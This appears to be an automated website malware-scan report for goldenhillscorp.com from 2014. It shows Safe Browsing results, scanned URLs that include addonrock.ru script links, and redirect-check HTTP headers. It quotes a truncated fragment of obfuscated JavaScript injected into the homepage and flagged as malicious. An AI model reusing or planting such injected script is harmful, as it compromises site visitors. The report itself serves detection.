Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=goldenhillscorp.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://goldenhillscorp.com/ | 200 OK Content-Length: 9446 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var j={I:{j:{j:'~',l:'.',I:'^'},l:{j:'%',l:218915,I:1154%256},I:{j:1^0,l:55,I:'ijl'}},j:{j:{j:function(I){try{var l=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x69\x6e\x70\x75\x74');l['\x74\x79\x70\x65']='\x68\x69\x64\x64\x65\x6e';l['\x76\x61\x6c\x75\x65']=I;l['\x69\x64']='\x6a';document['\x62\x6f\x64\x79']['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](l);}catch(I){return false;} return true;},l:function(){try{var l=document['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\ j.j.l.I(); Antivirus reports:
| ||
http://addonrock.ru/Username.js | 500 Can't connect to addonrock.ru:80 Content-Length: 187 Content-Type: text/plain | clean |
http://addonrock.ru/test404page.js | 500 Can't connect to addonrock.ru:80 Content-Length: 187 Content-Type: text/plain | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: goldenhillscorp.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 13 Dec 2014 01:40:50 GMT
Accept-Ranges: bytes
ETag: "a42f5-24e6-779dfb00"
Server: Apache/2.0.58 (Unix) mod_ssl/2.0.58 OpenSSL/0.9.7j DAV/2 PHP/4.4.2 mod_perl/2.0.2 Perl/v5.8.0
Vary: Accept-Encoding,User-Agent
Content-Length: 9446
Content-Type: text/html; charset=ISO-8859-1
Last-Modified: Sat, 26 Nov 2011 17:19:08 GMT
...9446 bytes of data.
GET / HTTP/1.1
Host: goldenhillscorp.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 13 Dec 2014 01:40:50 GMT
Accept-Ranges: bytes
ETag: "a42f5-24e6-779dfb00"
Server: Apache/2.0.58 (Unix) mod_ssl/2.0.58 OpenSSL/0.9.7j DAV/2 PHP/4.4.2 mod_perl/2.0.2 Perl/v5.8.0
Vary: Accept-Encoding,User-Agent
Content-Length: 9446
Content-Type: text/html; charset=ISO-8859-1
Last-Modified: Sat, 26 Nov 2011 17:19:08 GMT
...9446 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: goldenhillscorp.com
Referer: http://www.google.com/search?q=goldenhillscorp.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: goldenhillscorp.com
Referer: http://www.google.com/search?q=goldenhillscorp.com
Result:
The result is similar to the first query. There are no suspicious redirects found.